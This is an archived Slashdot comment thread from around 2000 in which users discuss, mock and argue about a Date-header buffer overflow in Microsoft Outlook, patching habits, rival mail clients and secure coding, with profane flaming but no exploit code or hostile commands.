Got some not-so-much-news for you guys. That mind-numbing stench isn't innovation. It's a deceptively high-minded concept for individual power users, visciously mangled by Microsoft's complete inexperience with the multi-user/internet like some lean ground beef chew toy tossed to a pack of rabid weasels. 99.99% of the world doesn't use it, doesn't want to use it, and couldn't care less about it. The 0.01% that recognize it's existence are about equally divided on the subject: Either they've already disabled VBScripting on their machines, or they're writing code to exploit the other 99.99%

Would you be happy with a caretaker for your house that leaves the key in the lock and puts up a sign that says "Gone Fishin' 'till Tuesday"? And they knew about it since they shoehorned basic scripting into Word 95. It is beyond my comprehension why people believe that scripting viruses "just happen", like they're some Normal price of doing business. You hear crap like "That Loser who wrote this virus should be shot!", or "We lost (m|b|tr)illions of dollars to Melissa/Zipped_Files/Good_Times, someone should pay!!!" And the folks never take the time to think

"Why was is so damn easy to do?"

Because they made it easy to do. I mean, LOOK AT THE CODE, folks. Melissa and it's ilk are hardly rocket science. I_Love_You.vbs isn't a freakin' masterpiece. It's a script that should never have been allowed to run. Where's the security!!! Aunt Sally and Uncle Bob didn't want to run it. They don't know VBScript from Shinola. Yet, it ran on their box. Without their consent. Without their knowledge. And whacked all their files and mailed all their friends -- who continued the cycle.

What do you hear from Microsoft: "You have to stay Vigilant!" and "Those Devious Geniuses! They Struck Again!", and the popular "No System Is Ever Free Of Bugs" They crank up the spin-fest and fill Joe User's head with cheezy crap that sounds like it came off a bottle of cheap shampoo: "Upgrade, Set Options, Pray, Repeat!"

It never, ever had to be that way...

Thanks for listening...

Everyone?

[Felinoid]

>and certainly everyone should upgrade when the fix is made available.

Just being an asshole here :)
Everyone? But how am I goina apply it to my Linux box?

The point is good thow...

I want to scream when ever I hear someone say "But the user never upgrades"...
Thats the users defect... bugs happen... user dosn't bugfix he is SOL.
Hay I mean where the hell do companys like Microsoft make money when people don't upgrade?

Re:Bugtraq

[kel-tor]

most people dont like the product because it is a huge slogging hog... as a webserver, the domino component is quite nice however (once you figure out how to install it into your distro that is)

Re:?us? and them

[kiscica]

I'm not sure I understand what your beef is here. I certainly am not stipulating that Microsoft is "not all bad." I just don't believe that the fact that one of their programmers committed an inadvertent buffer overflow error is evidence of evil (if it were, then basically any assemblage of modern programmers, e.g. the loosely bound ones that are responsible for modern open source Unix distributions, would have to be judged by the same standard).

Microsoft has committed plenty of -advertent- (I know there is no such word, figure it out) acts of evil, and I have no problem with attacking them for such, though doing so hardly constitutes a major portion of my life.

Look, Microsoft was essentially irrelevant to me up until 1995 or so, since until then I rarely if ever "used" a computer -- I was too busy hacking on them, as I have been doing for the past twenty-three years or so, in the following environments: (in roughly chronological order) "bare metal", VAX VMS, LISP machines, and Unix. To this date I have written perhaps 2000 lines of code in an MS-DOS (not Windows) environment and that under duress.

Back then, the word "user" was virtually an insult, and I would have had to call you outside, BlueUndies, for characterizing me as a "Linux user" :-). Nowadays, however, we are, willy nilly, almost all users some of the time, even those of us who are programmers and hackers first and foremost. And even if we are Linux users, we are using our Linux in the midst of a net saturated with Windows desktops. So Microsoft is no longer irrelevant, even to me, even if I never use their sucky software

But for heaven's sake, if we are going to attack them, let us do based on their intentional Bad Decisions and Evil Moves and not for a programming mistake that, encouraged by a long-standing flaw of our common programming environment (C and the C library!), is rampant among programmers on every platform out there!

kiscica

There must be some kind of mistake.

[leo.p]

The W2K update button on my start menu informs me only that I should update to Media Player 7.

Re:There must be some kind of mistake.

[OmniFool]

Goto Office update

Re:Dumb Q

[Caspuh]

The Exchange CLIENT was merged into Outlook....not Exchange Server. Go sit in the corner.

Microsoft Innovation!

[superyooser]

This is the kind of innovation that makes Microsoft such a great company! Look at this note from a FIN site visitor:

"I fully intend to e-mail my representatives, and I hope they realize the important impact that Microsoft has had on the computing industry alone, and ALL the other industries as well."

Yes, you go ahead and send them that email from Outlook... hehehe I'm sure they'll be bowled over by your persuasive argument and buffer overflows.

FIN (Freedom to Innovate Network) should be VIN (Virus Innovation Network).

Lotus Notes

[Remote]

The program is painfully slow to start and close. It's a memory hog. Has horrible UI. Concept are counter-intuitive. Menu option names are cryptic. Gadgets are the worst I've ever seen. I haven't yet figured out how to see the headers. Even the sender's full address isn't shown in the mailbox window. Parts are translated, parts are not. I could go on with this all day long.

And maybe exploits aren't commom because of the small installed base.

Re:Date?

[pSyk]

hahah funn-n-ny

Spruce and Evolution

[catscan2000]

Good thing I use Spruce and Pine ;). Does anyone know if Evolution is almost ready yet?

At least it's easy to fix

[AlpineR]

All they need to do is send every user an e-mail that will exploit the bug to automatically install the patch. That's quite a convenient feature! ;-)

Re:How long can they keep this up?

[sredding]

Hmmmm... Flamebait... Must've struck a nerve. Score this as redundant then.

IMNSHO, it can't possibly be "massive" if I had the fix installed BEFORE I even heard of the security hole.

Of course, YMMV.

Re:?us? and them

[BlueUnderwear]

> I'm not sure I understand what your beef is here.

My beef was that you were attempting to misrepresent your own background: This could have happened to ?us?,, where us was supposed to meant the Linux/Unix community. However, your question marks gave you away, and in a rather spectacular way at that. Think about a Frenchman, saying, in a very thick French accent "I am prored to bee an Americanne". Funnily the question marks appeared around that very word that was the lie. Mind this little detail next time you try to impersonate the moderate Linux proponent.

> Back then, the word ?user? was virtually an insult

I would consider ?user? an insult too. But I have no beef with being called a user. My rant has nothing to do with user vs developer vs designer vs master architect vs whatever. I only used the words Linux user, as I could have used any other number of words such as Linux fan, Linux afficinado, penguinista or Linux proponent, etc. It's interesting that you feel more insulted by being called a user than being called a lier.

Re:Bugtraq

[Mike1024]

Hey!

People are still using IE 3.0!

Unfortunately, many updates are not worth doing for the majority of people. If IE 3.0 does what you want, you shouldn't have to make a 2-hour plus download just to stop a bug that shouldn't have existed in the first place.

Another problem with upgrading is what I call the Bullshit program' problem. On my Windows box, I use Office 97. I saved a word file and sent it to a friend. It was just under 1.5 MB. He uses Word 2000, and a while later, e-mailed me the file back, for reasons I won't go into. It had grown to 4Mb, and was in the Word 2000 format, which I couldn't open. I e-mailed him and asked what he had changed in the file, other than the format. He said: Nothing.

Many upgrades give the average user nothing more than features like OS integration and annoying talking paper clips. Which they don't want. These 'upgrades' regularly have a large download time and/or price tag.

I blame Microsoft. After all, this IS Slashdot.

Michael Tandy


...another insightless comment from Michael Tandy.

Dumb Q

[FascDot+Killed+My+Pr]

If the exploit happens "before the messages hits the Inbox", how can it be an Outlook problem? Isn't putting items in the Inbox a function of the server?
--

Re:Dumb Q

[Rombuu]

The article on /. is kind of misleading (heh, go figure)... the mail in question does have to be d/l from the mail server before anything can go south.

Re:Dumb Q

[sg_oneill]

Depends on what you mean by an INBOX. However, by this I assume it means that it fries stuff when MAPI gets it's hands on it ,and before handing it over to Outlook. That means it'll fry 3rd party exchange clients etc too. badbadbad

Re:Dumb Q

[.c]

Silly question... but why not just parse mail at the server, stripping anything out that doesn't follow the usual Date: formats?

Re:/., please... stop whining.

[handorf]

Look at it this way instead...
The most popular desktop operating system and office package in the world, the one that MANY /.ers have to help maintain, has a HUGE vulnerability.

I'm glad to find this stuff on /., but maybe we want a "MS Security Issue" section started.

Pointing fingers at the infrastructure

[SnakeStu]

It's very easy to blame Microsoft for letting a buffer overflow problem like this slip through. Just dump Outlook, right? Use [insert favorite non-MS product name here] instead and everything will be fine...

...not. While I am certainly not willing to excuse Microsoft in particular for this specific instance, it is unwise at best to assume that the same type of weakness does not, or will not in the future, exist in other, competing products. Given that software developers have shown, time and again, that they are unable or unwilling to catch and prevent this type of weakness from getting through, perhaps it's time to look for a stronger solution.

Specifically, perhaps it is time to fix the infrastructure -- in this case, Internet mail as a whole. Although it would be unfair to compare it to something as weak and outdated as QWK mail from the ol' BBS days, there are abundant weaknesses in the current model for Internet mail that allow nasty things like mail header security exploits. And spam. Imagine if spam was not just antisocial and/or illegal, but technically impossible?

How long can a date field be? For that matter, how long can any header field be? (No, I'm not asking for a technical answer based on the current system, I'm suggesting that you think about the meaning of the fields, and the maximum length necessary to impart that meaning.) Given that mail client software authors are demonstrably ignoring such length limitations, is it not time to enforce at the protocol level some basic validity and, ideally, permission from the recipient?

I don't have a blueprint to roll out for you. However, as long as we focus on the weaknesses of this or that client, server, company, etc., we are missing the boat.

Re:Pointing fingers at the infrastructure

[tftp]

Infrastructure is good enough. The problem is not there.

How long can a date field be? [...] is it not time to enforce at the protocol level some basic validity?

This would assume that we trust data because the data is now supposedly correct. Then an obvious exploit would be to forge invalid data!

The Right Way to fix the buffer overflow here is to assume that data is incorrect in any possible way - too long, too short, contains unexpected characters (like zeros) etc. etc. So the software does not depend on the data that it is processing.

Re:VIRUSES, not virii idiot

[afc]

What do generalization and wit have to do with ignorance and siliness?
--

Re:Wow.....

[Ralph+Wiggam]

Other people are going to yell "monopoly", but I have a different take on it. I work at a small company, and on occasion I develop custom software for our clients. My bosses are really cool guys that understand the work I do, and if I tell them that I don't have 100% confidence in something I wrote, it doesn't leave the door. At MS, it seems that marketing is completely running the show and they have no clue what the nerds are doing. I can see things like fiscal years and competitor release dates causing MS managers to yank unfinished software away from the engineers. It's a good way to make lots of money and produce really aweful software.

-B

MSNBC reports Microsoft Security Hole?

[billnapier]

Its good to see that a Microsoft owned news service can still cover security bugs in Microsoft products.

Re:MSNBC reports Microsoft Security Hole?

[BenHmm]

ah, but then again:

the cure recommended so far is for everyone to upgrade to IE5.5 as soon as possible

Now THAT'S marketing.

Re:MSNBC reports Microsoft Security Hole?

[jd]

This was reported by the SANS Institute, yesterday, and therefore MSNBC presumably felt trapped between the Devil and the deep blue sea. Drown in complaints or get fried by Red Mond.

I find these sorts of holes fascinating, especially in light of Microsoft's sales pitch of selling C3 secure systems. (Yes, this is the least secure you can get, and still get a rating, but the badge is still being used to promote the idea that Windows is secure.

One thought I had, after reading this news - if WINE could be made sufficiently stable & complete, it shouldn't be too difficult to write a virus which replaced MS' Windows with Linux, without the users even noticing. Do that, and Linux could subvert 98% of the desktops on the Internet within a matter of days.

(Wouldn't this be, well, illegal? Not if you put a shrink-wrap licence on the virus, which stated that running the virus constituted the user's agreement to the OS switch. If the licence failed to appear, and the virus ran without the user being able to detect it, well, that becomes a Microsoft issue, not a viral one.)

Re:MSNBC reports Microsoft Security Hole?

[billnapier]

Now we see how Microsoft holds onto that lead over netscape. I wonder what extra benifits the programmer that "introduced" that bug got.

2000-07-18 17:57:54 Major MS Windows Vulnerability

[GeekLife.com]

(rejected)

I wonder how many people submitted that. I put mine in about an hour after this TechWeb article came out.

It'd be cool to see some cut-away of the slashdot experience. Like, are the posters the ones who hit reject or accept? Is there an early team that does some filtering? Is one nay enough to reject an article, or do a few people look it over?
-----

nothing to get excited about

[grizzo]

the fact is, these things are going to continue happening until finally something comes along that causes outlook to format the hard drives of everybody who uses it. a shame, to be sure, that all those people will lose so much information but hey that's what you get for using outlook. or eudora. or whatever else you use. bottom line: stop worrying about viruses and accept that someday you will probably be the victim of one, and just hope that day doesn't come too soon (or hope you're smart enough to avoid it... either way, not much you can do).

Re:nothing to get excited about

[petis]

Hmm, maybe an insurance covering the risks of losing information because of viruses will be available in the future? In the last cryptogram from counterpane they announced an insurance, covering:

"1. Internet Asset and Income Protection Coverage provides insurance for Counterpane's Managed Security Monitoring customers who incur a loss of or damage to information assets resulting from a breach of security or technology failure. Also covers business interruption due to loss of use due to a breach."

(See http://www.counterpane.com/pr-lloydssl.html)

Not sure if virus attacks counts as "technology failure" or "breach of security" though..

Alternatives to Outlook?

[abischof]

At work, we're a win32 shop.. But, even worse, I have to use Outlook for my email client, since the mail server runs Exchange (no POP/IMAP if I understand correctly).

Anyhow, does anyone know of any alternative email clients that will work with the "Exchange mail protocol" (or whatever it's called)? It's not so much Outlook's security problems that I'm trying to avoid, but I don't particularly like its interface either ;).

Alex Bischoff
---

Re:VIRUSES, not virii idiot

[pohl]

clue-4-u, u silly grammar-nazi.

Re:outlook just cant be fixed

[Chalst]

You could say the same about sendmail.

Re:Not really

[AllynKC]

Per posts in NTBugTraq, the actual bug is within Internet Explorer, and is made visible in Outlook and Outlook Express due to calls to the faulty code.

The bug has been fixed in IE 5.01 SP1; so there already exists a solution to avoid the bug on a Win box. Also, on Win-9x, IE 5.5 also avoids the bug; but on W2K, IE 5.5 still carries this bug (go figure).

In my opinion, any bug fix from MS isn't going to accomplish much. The majority of systems which are reportedly vulverable are home systems where the users have failed to download the readilly available SW upgrades. If the users failed to download the upgrades, I doubt it's likely that they'll get around to downloading the bug fix either.

Why use outlook.

[cokane]

Okay, I really don't see what's so great about using outlook. It is obviously an extremely inferior product that Microsoft has been able to push using their Windows Operating System. I know plenty of people that are forced to use this crap because of their work. Perhaps it's time that companies stop using shitty products like this because some idiot with an MCSE tells them to because they didn't learn any better (no, I am not implying MCSE's are idiots, but an idiot with an MCSE is a dangerous entity, you can all admit that). The administration tried to get our university to switch to backoffice fro their mail servers so that everyone would have to use outlook for the integration with MS Schedule+. Our NE guys just laughed at them. If we replaced our AIX servers with NT boxen running NT it would be crash city. Face it, MS makes crap and everyone keeps buying it, just stop and ACTUALLY DO RESEARCH FOR A CHANGE. Perhaps then you will spend $1000 on a brand new system that does not crash and does not have blatant security holes and has a logical GUI.

Re:My favorite line in the article

[ameoba]

Something about this sound's suprising similar to the way that the authorities reascted to HIV/AIDS when they were finding out about it...

Re:/., please... stop whining.

[MousePotato]

actually...if a huge security but were found in Apache it would probably make the news just the same as this exploit did, especially considering Apache's huge inroads into the market share in the last two years. Fortunately the folks at Apache have a great product that isn't trying to cover a zillion bases at once like the MS office apps try to do.

Buffer Overflow.

[oh]

A program which reads one line of code from the user, saves it to a fixed sized buffer, and then prints it out is vulnerable to a buffer overflow

I'm not sure from this statement if you are saying that any program that does at least that is vulnerable, or that a program as simple as that could be vulnerable.

You have correctly stated what a buffer overflow is, but they are preventable. If the programmer checks the size of the line before writing it to a fixed size buffer, then they can prevent a buffer overflow. Its like trying to fit a #7 peg into a #2 hole. Buffer overflows are caused by shoddy programming. I would have thought that by now developers would be aware of the problems of not checking string lengths, but these problems still turn up

Buffer Overflow idiocy

[Steelforge]

I am curious if they ever taught anyone in school to ALWAYS CHECK IF THE BUFFER HAS BEEN FILLED! Seriously, this is one of the most basic lessons of computer science.

Re:The outlook scripting is for enterprise apps

[earache]

Ok, first thing:

Outlook is not just a mail client alone. It's an entire PIM suite.

Second thing, go ahead and whip up your little form in PHP. Now tie it into my marketing database sitting on my desktop. Oh shit you can't. Ok, let's move my database to the server. SQL migration script has been written? Oh shit no it hasn't.

Third thing, go ahead and whip up a little php form that inserts calendar items, to do items, journal entries in my Outlook? Oh wait you can't ... damn ...

The point, of course, is that comparing outlook and asp/php/jsp stuff really isn't appropriate in an enterprise situation where Marking Manager Mark wants other people in his company to update stuff sitting on his desktop or in his outlook setup.

WHICH, AGAIN, IS WHY OUTLOOK HAS SCRIPTING.

Re:Wow.....

[jafac]

You have discovered the secret, grasshopper.

I have worked in software companies for 8 years, and I can tell you bar none, that 90% of quality problems are caused by a marketing-driven schedule and feature set.

Yes, it's unavoidable that sofware has to sell to finance it's own development, and selling on a schedule is a requirement of marketing .You line up magazine reviews and trade shows months in advance, if the software doesn't ship on time, you miss this window, you end up losing a huge potential in sales - because of lack of hype. I've seen damn good products die on the vine due to missing the window; and I've also seen instances where the sales force of a large software company will only sell the best selling (largest bonus, easiest to sell) product, and ignore the rest, causing other products the company sells or introduces to die, all because nobody will stand up to the sales director and tell him to tell his people to get their asses in gear.

Other factors have been the easy ability for software companies to ship with massive defects to match a schedule, and put a patch on the web for downloads later - this was not nearly as common back when customers had to dial into a BBS for a patch (before widespread use of the web).

Basically, it's more of a competitive advantage to get a market presence (we're talking vapor here), than it is to ship a good stable product.

Who to blame?

The trade press. Whether the reviews are accurate or not, they still sell their rags. My company has a whole department of people whose job it is to "manage trade press relationships", that is, to make sure they get a favorable review. If we had a serious bug during an evaluation, our people fly out there and pucker up to the journalists, and no mention is made of the bug in the review.

This is life, in the software industry folks. It's only gotten worse.
And it will only get still worse.


if it ain't broke, then fix it 'till it is!

Re:Bugtraq

[PDHoss]

People are still using IE 3.0! Users generally too lazy to upgrade software, even if there's a known security issue

Unfortunately, MS has the tendency to make service packs/patches into "feature upgrades," meaning it fixes the bug and throws in some new (potentially plagued) stuff to boot. Just look at how few people have installed SP6... if it was only fixes for known issues, what's holding people back?

PDHoss

======================================

Hands up all who are surprised by this!

[Flounder]

.....

didn't think so.

Anyone notice this one?

[Danse]

This may be slightly OT, but this seems like the best place to post it since I doubt it would get a story of its own. Got this from the SANS Institute. Apparently another problem involving IE 4+ and Access 97 or 2K on just about every Windows platform. Don't think I've seen this one posted here. You can read about it here.

Re:nothing to do with flexibility

[cyber-vandal]

Exactly, which is one of the many reasons why the MS monopoly is a bad thing.

How long can they keep this up?

[chowda]

In just a few months we've seen several MASSIVE security holes in microsoft products.. how long will managers risk their companies by continuing to use these products? how long can microsoft keep saying "oops"? I'm rather surprised they aren't charging for these fixes.

Re:How long can they keep this up?

[Ian-K]

Ahem, what?!?

You gotta be kidding mate. Are you even vaguely aware of the time it takes a patch to be released for an open-source program, compared to a closed source one? Where the former takes a few hours typically, the latter can be expected in a few weeks at the earliest.

This is the first time I hear M$ will be releasing a patch that soon and it's an incredibly short time for their practices. Definitely a first for them.

Trian

Re:How long can they keep this up?

[neb]

I agree completely. How long can the insanity last? When will the management attitude change from "I can't get fired for using Micro$oft" to "I'll get fired if i use Micro$oft"?

Re:How long can they keep this up?

[CptLogic]

It doesn't matter anyway, now that Microshaft are planning to stop you buying their software. You will only be able to rent it. Of course, when you rent a house you are entitled to a certain standard of housing and the landlord is culpable if any of the heating/washing machine/other specified amenities go wrong.

Essentially, if I rent a house that is in the contract as saying "With washing machine, toilet and central heating" then all of those things are the landlord's responsibility to keep running for me to a useable standard.

Unfortunately I doubt that Microshaft will pay for the fixing and damage caused by their software not living up to it's claims. And it'll be because you clicked on the "Yes I Agree" button without reading the EULA that says "You hereby give up your basic human rights" But illegal contracts are another issue altogether that I don't want to rant about here.

ObSecurity: Hell of a lot of security issues with Open Source s/w on VULN-DEV recently. I note that the responses from Open Source authors are a lot quicker than fom big companies. I guess this is because they don't have to worry about profits dropping if the news gets out.

Chris.

moderate this up

[GodSpiral]

moderate this up

Re:$500 reward

[cyber-vandal]

How about one that fires up a message 'This virus was brought to you by a Microsoft security bug (tm)' 20 times. Perhaps then people would get the point.

Sample Code

[oniisan]

Does anyone have an example of this exploit?

Re:Sample Code

[friscolr]

there's also an article on Security Focus about this - http://www.securityfocus.com/news/61 - and yesterday there were some interesting posts about this, including one with a partially flawed exploit script. go to Forums-> mailing lists-> bugtraq to see the posts in question.

-f

Strange quote...

[Gabey]

"The only defense against the vulnerability is installing the Microsoft patch, which will be available shortly on the Microsoft.com security Web site."

I love it...they just automatically assume everyone in the world must use Outlook...

In case anyone's curious, I strongly recommend Kaufman Mail Warrior (http://pages.infinit.net/kaufman/Index.htm)

Handles multiple accounts with ease, nice interface, no viruses to worry about, and tiny (relatively)...one 700k executable or something...

Just felt like spreading the word :)

-Gabe

I meant the one above me, not parent

[GodSpiral]

not much text in here

Fix is already out...almost

[thechink]

It's available here.

look... its a buffer overflow bug...

[EnderWiggnz]

not a crappy script kiddy hack...

these things are really really really difficult to find... I mean... how many of your QA people will sit around and write low-level code to include in every possible field to test for buffer overflows...

I dont know of any where i work that are capable of even thinking about that... granted MS may have the best minds for it, but really, truthfully...

BUFFER OVERFLOW EXPLOITS HAPPEN...

now ... they should have fixed it sooner... hell... they had it since JUNE 8th...

IE 5.5

[londenberg]

I saw the advisory on NTBugTraq and the fix, the default install of either IE 5.01 or IE 5.5. So I got the latest and ... well the latest anyways. IE 5.5 munched my computer and it has so far taken about 2.5hrs and a half dozen reboots to get functional again. Microsoft sucks, I wish I didn't have to use it here at work!

Re:IE 5.5

[sredding]

Hmmm... my install went flawlessly. YMMV, I guess.

haven't "played with Win2k" yet...

[SethJohnson]

...since I haven't played with Win2k as yet....

How about:

...since I haven't stepped in Win2k as yet...

Seth

Re:C / C++ etc.

[zorgon]

Bring back pascal! What this country needs is strong type checking and a good national buffer defense! Vote for me in the next e-lection and I promise new F(nord)ederal regulations to require bounds checking for arrays and strings in all alpha, beta, and gold releases of all new compilers and interpreters. These evil buffer overflows must be stopped! Thank you, thank you very much.

WWJD -- What Would Jimi Do?

Re:Bugtraq

[NetCurl]

Thank you for your computer science lesson, but I was not directly commenting on the buffer overflow exploit. What I was trying to do was draw a parallel between this exploit, and the fact that in the same week, Microsoft has acheived "the worst exploit in their OS ever." My point is, there is an underlying problem. It's not just one thing, it's the philosophy and way that Microsoft is "innovating" that is the problem. Look at their track record this week alone. Two HUGE exploits that can execute almost completely independent of any user control.

Wouldn't the attack need to come from mail server?

[zeppelin71]

Can someone clarify for me whether or not, once the buffer overflow had been exploited, wouldn't the attack need to continue from the user's mail server? Also - I'm assuming the user's Outlook would crash and they'd restart... closing the open port.

Right, wrong? I'd be interested to know more. Thanks

Re:Wow.....

[GodSpiral]

Common...

although this bug has a huge impact, i wouldn't call OE's developers or QA team incompetent over it.

Did anyone notice this...

[spankenstein]

I thought this part of the story on CNN was really funny.

Corporate users aren't affected by the security hole. But home users, running Microsoft's Outlook or Outlook Express e-mail programs, are at risk.

Do no corporations use Outlook???

Re:Security certification needed?

[jafac]

You'd think that a company like Consumer's Union would be doing this.

Then again, I guess Ralph Nader is too busy running for president these days.

if it ain't broke, then fix it 'till it is!

How the MORONS at M$ could have avoided this

[muldrake]

The stupid shitheads could have tried reading RFC 821 and used standard techniques of mail handling that have been around since fucking 1982.

Then there would be no Melissa, no Love Bug and none of this other crap based on pathetic software that can't even handle a Date field. The pitiful MSNBC article was worthless, and apparently this is some kind of buffer overrun error. Can't they even avoid that shit, or have it actually CRASH when it hits an error it can't handle? This is one occasion where a BSOD would be preferable to what this idiotic software allows.

Yeah, I know, standard boilerplate Microshaft sucks rant.

Old Version of Notes

[zookie]

Wow, I didn't think I'd catch someone on /. defending MS's user interface.

To be fair, the referenced site deals with Notes 4.6. Notes 5.0, which came out over a year ago, completely changed the UI. I haven't gotten a chance to play with it, so I can't say if the UI is better or worse -- just that it's different.

Re:*yawn* more microsoft bashing

[muldrake]

I would like to see the linux community make a better email program then outlook.

Fucking /bin/mail is a better email program than outlook. Reading it out of /usr/spool with cat is a better email program than outlook.

Anyway, elm rules. All three methods I list are better than outlook, because they actually work and don't infect your computer with viruses.

My favorite line in the article

[monaco]

MSNBC.com learned of the flaw June 11, but agreed not to publish the information until Microsoft had a chance to supply a fix. That's standard practice in the computer security business in order to prevent possible harm to computer users.

*rolls eyes* Do I even need to elaborate?

Re:My favorite line in the article

Don't they have some kind of internal Q&A department to try to penetrate their products!?

BAHAHHAHAHAHAHAHHAHAHAHA!!!!!!! WAAAAAAAAAAAHAHAHAHHAHAHAH!!!!! HOOHOOOO!!!!!! WAAAAHAHHAHAHAHAHHA!!!!!!!

Whew! Thanks, that was a good one.

Re:My favorite line in the article

[Robert+Link]

Yes, actually, I believe you do need to elaborate. As far as I can tell the article's statement is accurate. In fact, I seem to recall a post on BUGTRAQ a week or two ago admonishing people to contact vendors privately and give them ten days or so to work up a patch before publishing a vulnerability. What is your beef with that?

-rpl

Re:My favorite line in the article

[pen]

According to a post on Bugtraq, Microsoft was notified on July 6th, but a patch was not released until the vulnerability was posted on Bugtraq.

--

Its Time For Eudora

[quakeaddict]

I am not a MS hater by any streth, but after I read this yesterday I downloaded and installed Eudora on my wife's pc last night.

Outlook, while a great e-mail client, is not something I will ever hook directly up to an internet account ever again.

I think, when it comes to Outlook, in the flexibility vs. security decision, MS has weighted too much towards flexibility.

Windows Millenium

[citizenc]

Microsoft's latest version of Windows, Windows Millenium Edition, includes IE5.5 final. I know this because they sent me a complementary copy for beta testing. (Heh.. doesn't seem very Microsoft to me.. a company that charges for patches (Win98 -> Win98SE = $130) gave me a copy of their newest OS? *Shrug*)

Buffer Overflow

[jjr]

How long would it take some one to figure out to exploit this one? I guess you should use eudora or Netscape for awhile.

Re:Buffer Overflow

[|0|4]

There's already exploit code out there. Links to it were provided in the USSR Labs' advisory, which appeared on NTBugTraq this morning.
Their advisory can be found in the NTBugTraq archives, here.

There are alternatives

[meadowsp]

Good luck to you if you do start your own slashdot, but don't get too disoulutioned. There's already alternatives out there, Kuro5hin, Advogato, Technocrat and even Nanodot. The quality of Slashdot really does seem to be going downhill recently. The only thing that keeps me here is that there still are a few interesting things. Bahh humbug, it was all much better in my day....

Re:The outlook scripting is for enterprise apps

[rhavyn]

Then why is it enabled by default? It seems to me that if [insert big enterprise here] wanted scripting, their IT departments could turn it on.

Re:THE EXPLOIT IS HERE!

[CoolVibe]

Crash outlook and spawn a browser with USSR lab's page loaded in it. You can change that easily btw :) (no, i'm not gonna tell how. figger it out yerself)

Re:VIRUSES, not virii idiot

[Ian-K]

Well,

as far as I recall, "virii" is the Latin and "viruses" is the modern English. So, he's not really at fault. Just a bit more linguistically educated than you.

Trian

Neither macro nor virus...

[|0|4]

...it's a buffer overflow.

Outlook doesn't check the length of one of the date fields - a long string of data in that field will overflow a buffer. Once this has occurred, arbitrary code can be executed.

The fix is to install IE 5.01 SP1 on any affected Windows platform. Or you can install IE 5.5 - but not on Win2K.

More information is available in the posts to BugTraq and NTBugTraq, which is where I got the above information.

Re:Neither macro nor virus...

[micahjd]

At times (like installing the new nVidia drivers) i think that the efforts to 'standardize' linux would be beneficial.

But, this is one area that linux really shines in... In windows, the DLL is guaranteed to be the same on all systems, so they all crash. Different linux distros and versions will have different binaries. A single buffer overflow exploit won't work on all of them.

I guess it's sort of like diversity in the gene pool preventing massive plagues.

There is a reason Lotus is losing

[tilly]

The interface.

Need I say more?

Cheers,
Ben

Not really

[Carnage4Life]

The email is stored on a server, your mail client retrieves it and then parses it before storing it in your inbox. According to the MSFT security release, Outlook doesn't check that all the fields are the correct size while parsing it...thus buffer overflow.

I thought by now, we'd be rid of buffer overflow bugs.

Unfortunately there's a fundamental disconnect..

[ry4an]

Unfortunately there's a fundamental disconnect in the corporate world between the security conscious admins and management. Mangagement wants things easy and standardized, and (for the most part) admins want things secure. These exploits can crop up every week and it won't do a thing to convince management that outlook is a bad choice.

Admins will continue to throw in layer after layer of mail pre-filtering software at the delivery level, when they should really just be able to get a secure MUA on their users' desktops.
--

Finally an "cluefull" Outlook exploit

[Pac]

I don't know about the rest of you, but I was rather tired of hearing the mass-media crying bloody murder against one or another teenager that happened to set free the newest and lamest VBA macro-virus.

At least this time it is a real bug, not a feature, and it has Microsoft working overnight to correct it. Those who remember the glorious days of early sendmail versions know that we've already been there, done that.

?us? and them

[BlueUnderwear]

ROTFL... While you may have a point (Unix had had its fair share of buffer overruns too...), you somewhat blew your credibility by your faux "educated Linux user who admits that MS is not all bad" attitude.

Re:?us? and them

[kiscica]

Ah, I see now.

Actually, you should read those question marks (which, of course, showed up as quotes on the machine I was posting from) as evidence that I rarely use a Windows machine at all: otherwise I'd be aware of that pitfall. (Also I happened to be posting that from a machine with a Hungarian keymap).

No, I certainly was not trying to "impersonate" anyone. Being a "Linux proponent," moderate or otherwise, is not really an important part of my life -- I don't spend all that much time proselytizing -- but I spend 8-10 hours a day working under Linux right now, and have spent a large part of the past 17 years of my life working under Unix systems, so I certainly feel comfortable in using that inclusive "us."

kiscica

Doesn't appear that serious...

[ronny-da-hill]

I use OE and have never got any viruses - maybe I just have a better class of friends! Just a thought...

Surely other email clients are vulnerable too?

[daveewart]

This vulnerability occurs when messages are downloaded via POP3 (or IMAP) and a buffer overflow in the Date header occurs. Every email client capable of downloading mail in this way is potentially at risk ... Well-coded clients will perform correct bounds-checking and not be affected, but surely MS Outlook is not the only one that fails to check?

Of course, exploiting the vulnerability may not be very easy, but the vulnerability could still be there ...

VM should handle this

[slashdot-me]

You'd think the virtual memory system could just deny execute access to memory alloc'ed by C. I gave it a try using VirtualAlloc with PAGE_READWRITE (not execute permission). Windows still exec'd the code. Maybe a kernel hacker could tell me if this is a limitation of the intel VM or another one of Bill's stupid mistakes.

Ryan

Techweb says Eudora is

[mirko]

Thechweb's article says that any mailer using MSIE(4+) HTML renderer is vulnerable...
--

Can http be vulnerable too?

[marat]

1. They said problem is in code shared with IE.
2. HTTP got headers too.

Every secretary using MSWord wastes enough resources

HAHA, Figures.

[linuxgod]

It figures, Microsoft can't really make a decent prduct much less make it secure. I can only imagine how many buffer overflows you will see when M$ releases their source. GO DOJ !!!!!

Re:Swiss cheezzz

[Rumble]

and your sig isn't from Platoon, it's from Full Metal Jacket.

Re:Just publishing a patch isn't going to fix this

[shippo]

IE 4 and 5 do come with an semi-automated update mechanism that will check to see which patches need installing, fetch them from MS and tell you to reboot if needed (MS systems can't overwrite a currently running DLL or EXE file). This is acessible from a menu option within Internet Explorer.

I have to run MS at work, and every day I check this site every day. I also check the standard Microsoft Technet security pages at regular intervals.

At home I run a home-brew Linux system. Again I check with the relevant sites to see which software to upgrade, then download it and compile. I am starting to get paranoid, so I will be switching to Debian, and use apt-get (or whatever it's called) to keep me as up to date as possible. I also regularly run the current Nessus against my home system to ensure that it is not susceptible to known exploits. Nessus itself has a mechanism to automatically update all scripts.

Past experience has shown that a lot of sites are clueless when it comes to security. I know of one company that is still using IE3 on every desktop. I don't want to know what's running on their servers!

Re:Bugtraq

[shippo]

Domino is probably the slowest webserver on the market. It has to do so much to render HTML out of a .NSF file.

As for security, Lotus do produce quarterly updates, and these do contain fixes to security problems. Some seem to be DoS problems with Domino itself.

Moderator points

[WowTIP]

I wish I had som mod points right now, not for your comment, but for your .sig. Hehe

--

"I'm surfin the dead zone

Re:Moderator points

[bakreule]

(nod) Thank you. :-)

Re:outlook just cant be fixed

[1010011010]

And people do.. read the Unix Hater's Handbook.

---- ----

Re:More Microsoft Bashing.. how sad

[PenguiN42]

someone didn't read the whole thing, or has no sense of humor. This guy was being facetious people!!!

-------------
